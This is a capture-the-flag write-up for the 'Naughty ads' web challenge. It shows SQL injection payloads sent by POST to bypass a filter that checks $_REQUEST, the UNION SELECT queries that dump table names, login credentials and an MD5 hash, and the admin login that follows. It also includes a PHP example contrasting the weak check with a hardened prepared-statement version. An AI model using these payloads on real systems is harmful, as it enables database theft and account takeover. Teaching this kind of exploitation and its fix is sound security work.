Tags: sqli php 

Rating: 1.8

# ▼▼▼ Naughty ads - Web (200 points) (122/500 teams = 24.4%) ▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

GET /robots.txt

```
User-agent: *
Disallow: /admin
Disallow: /*.phps
```

GET /index.phps

```

<HTML>
<HEAD>
<TITLE>NAUGHTY ADS c1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>


Home
</CENTER>
</BODY>
</HTML>

<HTML>
<HEAD>
<TITLE>NAUGHTY ADS c1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>

<map name="planetmap">
<area shape="rect" coords="287,93,523,261" href="?id=<?php echo array_pop($cols); ?>" alt="BDSM hookup">
<area shape="rect" coords="542,93,774,261" href="?id=<?php echo array_pop($cols); ?>" alt="Fat fetish">

<area shape="rect" coords="34,282,269,449" href="?id=<?php echo array_pop($cols); ?>" alt="Dirty mistress">
<area shape="rect" coords="292,282,521,449" href="?id=<?php echo array_pop($cols); ?>" alt="Femdom one night stand">
<area shape="rect" coords="545,282,777,449" href="?id=<?php echo array_pop($cols); ?>" alt="Waterboarding extasy">

<area shape="rect" coords="33,468,266,595" href="?id=<?php echo array_pop($cols); ?>" alt="Kinky nightmare">
<area shape="rect" coords="277,456,534,598" href="?id=<?php echo array_pop($cols); ?>" alt="Food fetish">
<area shape="rect" coords="547,466,780,599" href="?id=<?php echo array_pop($cols); ?>" alt="Whip experience">

<area shape="rect" coords="595,23,619,57" href="/admin" alt="Admin">
</map>
</CENTER>
</BODY>
</HTML>
```

The filter is applied to `$_REQUEST['id']`, but `$_GET['id']` is what goes into the query ⇒ **SQL injection**

Use the **POST method** to bypass the filter.
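The check/use mismatch noted above, shown next to a hardened form. This is an added example, not the challenge's source (its PHP is not reproduced on this page). The filter regex, the `description` column, the alphanumeric id format and the request arrays are constructed assumptions.

```php
<?php
// Added example. Constructed table contents and request arrays; the filter
// regex, the `description` column and the id format are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ads (id TEXT PRIMARY KEY, description TEXT)");
$db->exec("INSERT INTO ads VALUES ('a1', 'constructed sample ad')");

// Weak: the filter inspects $_REQUEST['id'], the query uses $_GET['id'].
// $_REQUEST is a merge of GET, POST and possibly cookies (request_order),
// so the two can hold different values for the same key.
function lookup_weak(PDO $db, array $get, array $request): ?string
{
    if (preg_match('/union|select|\'/i', (string)($request['id'] ?? ''))) {
        return null; // rejected, but only the merged value was checked
    }
    $sql = "SELECT description FROM ads WHERE id = '" . ($get['id'] ?? '') . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : null;
}

// Hardened: one source, strict allow-list, bound parameter.
function lookup_hardened(PDO $db, array $get): ?string
{
    $id = $get['id'] ?? '';
    if (!is_string($id) || !preg_match('/\A[A-Za-z0-9]{1,32}\z/', $id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT description FROM ads WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : null;
}

// Constructed request: the merged array carries a clean id, GET does not.
$get     = ['id' => "x' OR '1'='1"];
$request = ['id' => 'a1'];

var_dump(lookup_weak($db, $get, $request)); // filter passes, quote reaches SQL
var_dump(lookup_hardened($db, $get));       // rejected before any query runs
var_dump(lookup_hardened($db, ['id' => 'a1']));
```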

**POST** /index.php?id='UNION+select+group_concat(**table_name**)+from+information_schema.tables--+

```
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,OPTIMIZER_TRACE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,INNODB_LOKS,INNODB_TRX,INNODB_SYS_DATAFILES,INNODB_FT_CONFIG,INNODB_SYS_VIRTUAL,INNODB_CMP,INNODB_FT_BEING_DELETED,INNODB_CMP_RESET,INNODB_CMP_PER_INDEX,INNODB_CMPMEM_RESET,INNODB_FT_DELETED,INNODB_BUFFER_PAGE_LRU,INNODB_LOCK_WAITS,INNODB_TEMP_TABLE_INFO,INNODB_SYS_INDEXES,INNODB_SYS_TABLES,INNODB_SYS_FIELDS,INNODB_CMP_PER_INDEX_RESET,INNODB_BUFFER_PAGE,INNODB_FT_DEFAULT_STOPWORD,INNODB_FT_INDEX_TABLE,INNODB_FT_INDEX_CACHE,INNODB_SYS_TABLESPACES,INNODB_METRICS,INNODB_SYS_FOREIGN_COLS,INNODB_CMPMEM,INNODB_BUFFER_POOL_STATS,INNODB_SYS_COLUMNS,INNODB_SYS_FOREIGN,INNODB_SYS_TABLESTATS,ads,login
```

POST /index.php?id='UNION+select+group_concat(**column_name**)+from+information_schema.columns+where+table_name='**login**'--+

```
id,name,password
```

POST /index.php?id='UNION+select+group_concat(**name**)from+**login**--+

```
webmasterofdoom3755
```

POST /index.php?id='UNION+select+group_concat(**password**)from+**login**--+

```
5ebe2294ecd0e0f08eab7690d2a6ee69
```

↓ Google search

MD5(**secret**)

GET /admin/

Enter the Basic Authentication credentials `webmasterofdoom3755:secret`.

Enter his phone number: "**555-31338**"

**SECT{~tr4nsv3stiT3s_w3lc0me_t00~}**